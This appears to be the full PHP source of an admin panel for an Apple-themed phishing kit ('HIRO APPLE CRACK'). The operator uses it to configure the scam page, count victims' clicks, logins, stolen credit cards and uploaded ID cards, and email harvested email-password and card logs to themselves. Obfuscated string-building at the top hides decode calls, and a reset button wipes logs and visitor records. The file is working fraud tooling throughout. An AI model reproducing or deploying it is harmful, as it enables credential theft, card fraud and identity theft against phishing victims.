PANEL BOS

1. <?php
2.  
3. error_reporting(0);
4. @require_once "setting.php";
5. $OOO00O00O = str_replace("xx","gz",$O0O00O00O);
6. $OOO00O000 = str_replace("hr","ss",$OOO00O00O);
7. $OOO0OO000 = "hiroploenc";
8. $OOO00OOO0 = str_replace("hiro","ex",$OOO0OO000);
9. $OOOO0OOO0 = str_replace("enc","de", $OOO00OOO0);
10. $O0OO00OO0 = "ASEK48_MAMAM";
11. $OOOO00OOO = str_replace("ASEK48","base64",$O0OO00OO0);
12. $O00OO0O0O = str_replace("MAMAM","decode",$OOOO00OOO);
13. $O00OO0OOO = file_get_contents(__FILE__);
14. ?>
15. <!DOCTYPE html>
16. <html>
17. <head>
18. <meta charset="utf-8">
19. <meta http-equiv="X-UA-Compatible" content="IE=edge">
20. <meta name="viewport" content="width=device-width, initial-scale=1">
21.  
22. <title>HIRO APPLE CRACK</title>
23. <link href="//brobin.github.io/hacker-bootstrap/css/hacker.css" rel="stylesheet">
24.  
25. <style>
26. .tall-row {
27. margin-top: 40px;
28. }
29. .modal {
30. position: relative;
31. top: auto;
32. right: auto;
33. left: auto;
34. bottom: auto;
35. z-index: 1;
36. display: block;
37. }
38. .clc{
39. background-color: black;
40. color: white;
41. }
42. .clc:hover{
43. background:white;
44. color: black;
45. }
46. </style>
47. </head>
48.  
49. <body>
50. <nav class="navbar navbar-default navbar-static-top">
51. <div class="container">
52. <div class="navbar-header">
53. <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
54. <span class="sr-only">Toggle navigation</span>
55. <span class="icon-bar"></span>
56. <span class="icon-bar"></span>
57. <span class="icon-bar"></span>
58. </button>
59. <a class="navbar-brand" href="#">HIROXRSJ Recode MOREZARGANG (<font color="pink">007</font>)</a>
60. </div>
61. <div id="navbar" class="navbar-collapse collapse">
62. <ul class="nav navbar-nav navbar-right">
63.  
64. <li>
65. <a href="https://<?php echo $_SERVER['SERVER_NAME']."/".$param;?>" target="_blank">View Scam</a>
66. </li>
67. </ul>
68. </div>
69. </div>
70. </nav>
71. <div class="container">
72. <div class="row">
73. <div class="col-lg-6">
74. <div class="well">
75. <fieldset>
76. <legend>Mode</legend>
77. <center><font color ="yellow">* Read file "readme.txt" !!</font></center><br>
78. <form method="POST" class="form-horizontal">
79. <div class="form-group">
80. <label for="inputEmail" class="col-lg-2 control-label">True Login</label>
81. <div class="col-lg-10">
82. <input class="col-lg-5 control-label" type="text" readonly="true" name="tll" value="<?php echo $t_login; ?>"></input>
83. <select class="col-lg-5 control-label" name="tlb">
84. <option value="yes">Yes</option>
85. <option value="no">No</option>
86. </select>
87. <input type="submit" class="btn btn-primary control-label" name="tls" value="Save"></input>
88. </div>
89. </div>
90.  
91.  
92. </form>
93. <form method="POST" class="form-horizontal">
94. <div class="form-group">
95. <label for="inputEmail" class="col-lg-2 control-label">panel</label>
96. <div class="col-lg-10">
97. <input class="col-lg-5 control-label" type="text" readonly="true" name="keylama" value="<?php echo $panel; ?>"></input>
98. <input class="col-lg-5 control-label" type="text" name="keybaru" placeholder="KeyPanel"></input>
99. <input type="submit" class="btn btn-primary control-label" name="key" value="Save"></input>
100. </div>
101. </div>
102.  
103.  
104. </form>
105. <form method="POST" class="form-horizontal">
106. <div class="form-group">
107. <label for="inputEmail" class="col-lg-2 control-label">Site Scam</label>
108. <div class="col-lg-10">
109. <input class="col-lg-5 control-label" type="text" readonly="true" name="parla" value="<?php echo $param; ?>"></input>
110. <input class="col-lg-5 control-label" type="text" name="parba" placeholder="ParameterSite"></input>
111. <input type="submit" class="btn btn-primary control-label" name="param" value="Save"></input>
112. </div>
113. </div>
114.  
115.  
116. </form>
117. <form method="POST" class="form-horizontal">
118. <div class="form-group">
119. <label for="inputEmail" class="col-lg-2 control-label">User Agent</label>
120. <div class="col-lg-10">
121. <input class="col-lg-5 control-label" type="text" readonly="true" name="ual" value="<?php echo $user_allow; ?>"></input>
122. <select class="col-lg-5 control-label" name="uab">
123. <option value="true">Yes (True)</option>
124. <option value="false">No (False)</option>
125. </select>
126. <input type="submit" class="btn btn-primary control-label" name="usas" value="Save"></input>
127. </div>
128. </div>
129.  
130.  
131. </form>
132.  
133. <form method="POST" class="form-horizontal">
134. <div class="form-group">
135. <label for="inputEmail" class="col-lg-2 control-label">One Time Access</label>
136. <div class="col-lg-10">
137. <input class="col-lg-5 control-label" type="text" readonly="true" name="otal" value="<?php echo $One_Time_Access; ?>"></input>
138. <select class="col-lg-5 control-label" name="otab">
139. <option value="block">Yes (Block)</option>
140. <option value="non">No (Non)</option>
141. </select>
142. <input type="submit" class="btn btn-primary control-label" name="otas" value="Save"></input>
143. </div>
144. </div>
145.  
146.  
147. </form>
148.  
149. </div>
150. <button href="#" class="btn btn-info">Click <span class="badge"><?php echo empty(file_get_contents("assets/logs/._click_.txt")) ? "0" : file_get_contents("assets/logs/._click_.txt"); ?></span></button>
151. <button href="#" class="btn btn-warning">Login <span class="badge"><?php echo empty(file_get_contents("assets/logs/._login_.txt")) ? "0" : file_get_contents("assets/logs/._login_.txt"); ?></span></button>
152. <button href="#" class="btn btn-danger">CC <span class="badge"><?php echo empty(file_get_contents("assets/logs/._ccz_.txt")) ? "0" : file_get_contents("assets/logs/._ccz_.txt"); ?></span></button>
153. <button href="#" class="btn btn-primary">ID Card <span class="badge"><?php echo empty(file_get_contents("assets/logs/._upload_.txt")) ? "0" : file_get_contents("assets/logs/._upload_.txt"); ?></span></button>
154. <form method="POST" action""><button class="btn btn-default" type="submit" name="rd">Reset Log</button>
155. <button class="btn btn-default" type="submit" name="sd">Get Log Empas</button>
156. <button class="btn btn-default" type="submit" name="sb">Get Log Bin</button></form>
157.  
158. </div>
159.  
160. <div class="col-lg-6">
161. <div class="well">
162. <form method="POST" class="form-horizontal">
163. <fieldset>
164. <legend>Email</legend>
165. <div class="form-group">
166. <label for="inputEmail" class="col-lg-2 control-label">New Email</label>
167. <div class="col-lg-10">
168. <input class="form-control" name="baru" value="" placeholder="emailexample.com" type="text">
169. </div>
170. </div>
171. <div class="form-group">
172. <label for="inputEmail" class="col-lg-2 control-label">Email Active</label>
173. <div class="col-lg-10">
174. <input class="form-control" readonly="true" name="lama" value="<?php echo $Your_Email; ?>" type="text">
175. </div>
176. </div>
177. <input type="submit" class="btn btn-primary" name="email" value="Change Email"></input>
178. </form>
179. <br>
180. <form method="POST" class="form-horizontal">
181. <div class="form-group">
182. <label for="inputEmail" class="col-lg-2 control-label">Double CC</label>
183. <div class="col-lg-10">
184. <input class="col-lg-5 control-label" type="text" readonly="true" name="dccl" value="<?php echo $doublecc; ?>"></input>
185. <select class="col-lg-5 control-label" name="dccb">
186. <option value="active">Yes (Active)</option>
187. <option value="notactive">No (NonActive)</option>
188. </select>
189. <input type="submit" class="btn btn-primary control-label" name="dccs" value="Save"></input>
190. </div>
191. </div>
192.  
193.  
194. </form>
195. <form method="POST" class="form-horizontal">
196. <div class="form-group">
197. <label for="inputEmail" class="col-lg-2 control-label">Id Card</label>
198. <div class="col-lg-10">
199. <input class="col-lg-5 control-label" type="text" readonly="true" name="idcl" value="<?php echo $idcard; ?>"></input>
200. <select class="col-lg-5 control-label" name="idcb">
201. <option value="yoi">Yes (Yoi)</option>
202. <option value="noi">No (Noi)</option>
203. </select>
204. <input type="submit" class="btn btn-primary control-label" name="idcs" value="Save"></input>
205. </div>
206. </div>
207.  
208.  
209. </form>
210. <form method="POST" class="form-horizontal">
211. <div class="form-group">
212. <label for="inputEmail" class="col-lg-2 control-label">TypeLogin</label>
213. <div class="col-lg-10">
214. <input class="col-lg-5 control-label" type="text" readonly="true" name="tyll" value="<?php echo $typelogin; ?>"></input>
215. <select class="col-lg-5 control-label" name="tylb">
216. <option value="locked">Locked</option>
217. <option value="invoice">Invoice</option>
218. </select>
219. <input type="submit" class="btn btn-primary control-label" name="tyls" value="Save"></input>
220. </div>
221. </div>
222.  
223.  
224. </form>
225. </div>
226. </div>
227.  
228. </div>
229. <?php
230. unlink("set.php");
231.  
232. $lama = trim($_POST['lama']);
233. $baru = trim($_POST['baru']);
234. $keylama = trim($_POST['keylama']);
235. $keybaru = trim($_POST['keybaru']);
236. $parla = trim($_POST['parla']);
237. $parba = trim($_POST['parba']);
238. $ual = trim($_POST['ual']);
239. $uab = trim($_POST['uab']);
240. $tll = trim($_POST['tll']);
241. $tlb = trim($_POST['tlb']);
242. $otal = trim($_POST['otal']);
243. $otab = trim($_POST['otab']);
244. $dccl = trim($_POST['dccl']);
245. $dccb = trim($_POST['dccb']);
246. $idcl = trim($_POST['idcl']);
247. $idcb = trim($_POST['idcb']);
248. $tyll = trim($_POST['tyll']);
249. $tylb = trim($_POST['tylb']);
250. $file = "setting.php";
251. $isi = file_get_contents($file);
252.  
253. if(isset($_POST['email'])) {
254. if(preg_match("#\b$lama\b#is", $isi)) {
255. $isi = str_replace($lama,$baru,$isi);
256. $buka = fopen($file,'w');
257. fwrite($buka,$isi);
258. fclose($buka);
259.  
260. echo "<script>alert('Success')</script>";
261. echo "<meta http-equiv='refresh' content='0; url=#ganti_email'/>";
262. }
263. else
264. echo "<script>alert('Failed')</script>";
265. }
266. else if(isset($_POST['key'])) {
267. if(preg_match("#\b$keylama\b#is", $isi)) {
268. $isi = str_replace($keylama,$keybaru,$isi);
269. $buka = fopen($file,'w');
270. fwrite($buka,$isi);
271. fclose($buka);
272.  
273. echo "<script>alert('Success')</script>";
274. echo "<meta http-equiv='refresh' content='0; url=http://$_SERVER[HTTP_HOST]/priv/$keybaru#ganti_key'/>";
275. echo "<meta http-equiv='refresh' content='0; url=http://$_SERVER[HTTP_HOST]/priv/$keybaru#ganti_key'/>";
276. }
277. else
278. echo "<script>alert('Failed')</script>";
279. }else if(isset($_POST['usas'])) {
280. if(preg_match("#$ual#is", $isi)) {
281. $isi = str_replace($ual,$uab,$isi);
282. $buka = fopen($file,'w');
283. fwrite($buka,$isi);
284. fclose($buka);
285. echo "<script>alert('Success')</script>";
286. echo "<meta http-equiv='refresh' content='0; url=#change_userallow'/>";
287. echo "<meta http-equiv='refresh' content='0; url=#change_userallow'/>";
288. }
289. else
290. echo "<script>alert('Failed')</script>";
291. }else if(isset($_POST['param'])) {
292. if(preg_match("#param = \"$parla\"#is", $isi)) {
293. $isi = str_replace("$parla\"; // Parameter Redirect","$parba\"; // Parameter Redirect",$isi);
294. $buka = fopen($file,'w');
295. fwrite($buka,$isi);
296. fclose($buka);
297.  
298. rename($parla.".php",$parba.".php");
299.  
300. echo "<script>alert('Success')</script>";
301. echo "<meta http-equiv='refresh' content='0; url=#ganti_parameter'/>";
302. echo "<meta http-equiv='refresh' content='0; url=#ganti_parameter'/>";
303. }
304. else
305. echo "<script>alert('Failed')</script>";
306. }else if(isset($_POST['tls'])) {
307. if(preg_match("#$tll#is", $isi)) {
308. $isi = str_replace($tll,$tlb,$isi);
309. $buka = fopen($file,'w');
310. fwrite($buka,$isi);
311. fclose($buka);
312. echo "<script>alert('Success')</script>";
313. echo "<meta http-equiv='refresh' content='0; url=#change_truelogin'/>";
314. echo "<meta http-equiv='refresh' content='0; url=#change_truelogin'/>";
315. }
316. else
317. echo "<script>alert('Failed')</script>";
318. }else if(isset($_POST['otas'])) {
319. if(preg_match("#$otal#is", $isi)) {
320. $isi = str_replace($otal,$otab,$isi);
321. $buka = fopen($file,'w');
322. fwrite($buka,$isi);
323. fclose($buka);
324. echo "<script>alert('Success')</script>";
325. echo "<meta http-equiv='refresh' content='0; url=#change_OneTimeAccess'/>";
326. echo "<meta http-equiv='refresh' content='0; url=#change_OneTimeAccess'/>";
327. }
328. else
329. echo "<script>alert('Failed')</script>";
330. }else if(isset($_POST['dccs'])) {
331. if(preg_match("#$dccl#is", $isi)) {
332. $isi = str_replace($dccl,$dccb,$isi);
333. $buka = fopen($file,'w');
334. fwrite($buka,$isi);
335. fclose($buka);
336. echo "<script>alert('Success')</script>";
337. echo "<meta http-equiv='refresh' content='0; url=#change_DoubleCC'/>";
338. echo "<meta http-equiv='refresh' content='0; url=#change_DoubleCC'/>";
339. }
340. else
341. echo "<script>alert('Failed')</script>";
342. }else if(isset($_POST['idcs'])) {
343. if(preg_match("#$idcl#is", $isi)) {
344. $isi = str_replace($idcl,$idcb,$isi);
345. $buka = fopen($file,'w');
346. fwrite($buka,$isi);
347. fclose($buka);
348. echo "<script>alert('Success')</script>";
349. echo "<meta http-equiv='refresh' content='0; url=#change_IDCard'/>";
350. echo "<meta http-equiv='refresh' content='0; url=#change_IDCard'/>";
351. }
352. else
353. echo "<script>alert('Failed')</script>";
354. }
355. else if(isset($_POST['tyls'])) {
356. if(preg_match("#$tyll#is", $isi)) {
357. $isi = str_replace($tyll,$tylb,$isi);
358. $buka = fopen($file,'w');
359. fwrite($buka,$isi);
360. fclose($buka);
361. echo "<script>alert('Success')</script>";
362. echo "<meta http-equiv='refresh' content='0; url=#change_TypeLogin'/>";
363. echo "<meta http-equiv='refresh' content='0; url=#change_TypeLogin'/>";
364. }
365. else
366. echo "<script>alert('Failed')</script>";
367. }
368. else if(isset($_POST['rd'])) {
369. unlink("._no_.txt");
370. unlink("._nob_.txt");
371. unlink("assets/logs/._click_.txt");
372. unlink("assets/logs/._login_.txt");
373. unlink("assets/logs/._ccz_.txt");
374. unlink("assets/logs/._upload_.txt");
375. unlink("._logz_.txt");
376. unlink("assets/logs/hmp.log");
377. unlink("assets/logs/bin.log");
378. unlink("error_log");
379. unlink("._ssid.txt");
380. // unlink("assets/includes/blacklist.dat");
381. unlink("assets/logs/accepted_visitors.txt");
382. unlink("assets/logs/ip2_log.txt");
383. unlink("assets/logs/denied_visitors.txt");
384. unlink("assets/logs/visitor_logged_in.txt");
385.  
386. $filee = file_get_contents("assets/includes/blacklist.dat");
387. $cek = preg_match_all("/# NETCRAFT IP RANGES(.*)# USERS COMPLETED/is", $filee, $res) ? $res : null;
388. $buka = fopen("assets/includes/blacklist.dat",'w');
389. fwrite($buka,$cek[0][0]."\r\r");
390. fclose($buka);
391.  
392. echo "<script>alert('Success')</script>";
393. echo "<meta http-equiv='refresh' content='0; url=#reset_data'/>";
394. }
395. else if(isset($_POST['sd'])) {
396. $empass = file_get_contents(dirname(__FILE__)."/assets/logs/hmp.log");
397. $exem = explode("\n",$empass);
398. $total = count($exem);
399. $total = $total-1;
400. if($total <= 0)
401. {
402. echo '<script>alert("Failed\n\Email And Password Not Found.")</script>';
403. }
404. else
405. {
406. $fil = "._no_.txt";
407. $last = (file_get_contents($fil) == "" ? "1" : file_get_contents($fil));
408. $urut = fopen($fil,"w");
409. fwrite($urut,$last+1);
410. fclose($urut);
411.  
412. $headers = "From: Empas Apel <empas@morezar.id>\r\n";
413. $headers .= "Reply-to: empas@morezar.id\r\n";
414. $headers .= "MIME-Version: 1.0\r\n";
415. $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
416. $subj = "[ Empas #$last ] [ Total $total Lines ] [ ".date("D, d-F-y H:i")." ]";
417. $to = $Your_Email;
418. $data = "-=====================[ Allhamdulilah Sugih Ingkang Barokah ]=====================-
419.  
420. -----------------------------------------------------------------
421. $empass
422. -----------------------------------------------------------------";
423.  
424. mail($to, $subj, $data, $headers);
425.  
426. echo "<script>alert('Success')</script>";
427. echo "<meta http-equiv='refresh' content='0; url=#send_empas'/>";
428. }
429. }
430. else if(isset($_POST['sb'])) {
431. $binbin = file_get_contents(dirname(__FILE__)."/assets/logs/bin.log");
432. $exbin = explode("\n",$binbin);
433. $total = count($exbin);
434. $total = $total-1;
435. if($total <= 0)
436. {
437. echo '<script>alert("Failed~\n\nBIN Not Found.")</script>';
438. }
439. else
440. {
441. $fil = "._nob_.txt";
442. $last = (file_get_contents($fil) == "" ? "1" : file_get_contents($fil));
443. $urut = fopen($fil,"w");
444. fwrite($urut,$last+1);
445. fclose($urut);
446.  
447. $headers = "From: Bin Colletions <bin@morezar.id>\r\n";
448. $headers .= "Reply-to: bin@morezar.id\r\n";
449. $headers .= "MIME-Version: 1.0\r\n";
450. $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
451. $subj = "[ Bin #$last ] [ Total $total Cards ] [ ".date("D, d-F-y H:i")." ]";
452. $to = $Your_Email;
453. $data = "-=====================[ Allhamdulilah Sugih Ingkang Barokah ]=====================-
454.  
455. -----------------------------------------------------------------
456. $binbin
457. -----------------------------------------------------------------";
458.  
459. mail($to, $subj, $data, $headers);
460.  
461. echo "<script>alert('Success')</script>";
462. echo "<meta http-equiv='refresh' content='0; url=#send_bin'/>";
463. }
464. }
465. else if(isset($_POST['sl'])) {
466. $fil2 = "._logz_.txt";
467. $lasts = (file_get_contents($fil2) == "" ? "1" : file_get_contents($fil2));
468. $urut = fopen($fil2,"w");
469. fwrite($urut,$lasts+1);
470. fclose($urut);
471.  
472. $headers = "From: Report <report@morezar.id>\r\n";
473. $headers .= "Reply-to: report@morezar.id\r\n";
474. $headers .= "MIME-Version: 1.0\r\n";
475. $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
476. $subj = "[ Report #$lasts ] [ MOREZAR GANG ] [ ".date("D, d-F-y H:i")." ]";
477. $to = $Your_Email;
478. $tor = $tglorder;
479. $tcl = (file_get_contents("assets/logs/._click_.txt") == "" ? "0" : file_get_contents("assets/logs/._click_.txt"));
480. $tlo = (file_get_contents("assets/logs/._loginz_.txt") == "" ? "0" : file_get_contents("assets/logs/._loginz_.txt"));
481. $tcc = (file_get_contents("assets/logs/._ccz_.txt") == "" ? "0" : file_get_contents("assets/logs/._ccz_.txt"));
482. $tlh = substr_count(file_get_contents("._ssid.txt")," ");
483. $det = array("u" => $_SERVER['SERVER_NAME'],"p" => $_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"],"m" => $umurlog,"tc" => $tcl,"tl" => $tlo,"tcc" => $tcc,"lh" => $tlh);
484. $data = "
485. -=====================[ MOREZAR GANG ]=====================-
486. # Domen Scam : ".$det['u']."
487. # Panel Scam : ".$det['p']."
488. # Umur Scam : ".$det['m']." hari
489. # Tanggal Order : ".$tor."
490. # Total Load : ".$det['lh']."
491. # Total Klik : ".$det['tc']."
492. # Total Login : ".$det['tl']."
493. # Total Card : ".$det['tcc']."
494. -=====================[ Allhamdulilah Sugih Ingkang Barokah ]=====================-";
495.  
496. mail($to, $subj, $data, $headers);
497.  
498. echo "<script>alert('Success')</script>";
499. echo "<meta http-equiv='refresh' content='0; url=#send_report'/>";
500. }
501. ?>
502. <div class="row tall-row">
503. <div class="col-md-12">
504. <p>Created by HIROXRSJ Recode MOREZARGANG &copy; 2018</p>
505. </div>
506. </div>
507. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
508. <script src="//maxcdn.bootstrapcdn.com/bootstrap/3.3.4/js/bootstrap.min.js"></script>
509.  
510. </body>
511. </html>